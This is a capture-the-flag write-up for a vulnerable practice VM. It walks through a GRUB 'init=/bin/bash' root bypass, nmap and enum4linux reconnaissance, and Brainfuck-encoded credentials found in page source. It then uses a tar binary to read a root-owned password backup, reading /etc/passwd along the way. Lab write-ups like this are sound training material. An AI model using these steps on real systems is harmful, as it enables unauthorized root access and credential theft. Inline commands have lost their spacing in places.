Since i can download the box and boot it from my vmware and choose how to boot on startup..
I've pressedeto edit out how to boot the machine.
At linux section i've just addedrw init=/bin/bashand restarted the machine withf10when machine booted, I didnt needed no creds, i was root, didcat /etc/passwdand changed the user password, or just could straight look into the flags files.
The machine booted up, i saw it showed eth0 IP
netdiscover -r <ip>/24would work also) nmap revealed open ports were
http 80,10000,20000
smb 139,445
enum4linux -a <target IP>--> reveals user name was cyber
going into port 80, pressedCtrl+uand at the bottom were BrainFuck enctyped code:
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->This decoded at this site
cyber:.2uqPEfj3D<P'a-3
now i could log into the website on port 10000 or machine with cyber.
home directory hadtarexecution file which was odd.
found manualy/var/backups/.old_pass.bakthat was belong to root. (made by root, and user can use it, so if i use it on root's file it should work)
I've used the tar command to archive the old_pass.bak into tar and extract it with cyber as the new owner of the file.
./tar -cf <my-tar>.tar /var/bakcups/.old_pass.bak./tar -xf <my-tar>.tarcat ~/var/backups/.old_pass.bak-> revealsroot:Ts&4&YurgtRX(=~h- logged in as root and got the root's flag.
- User flag: 3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
- Roots flag: 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}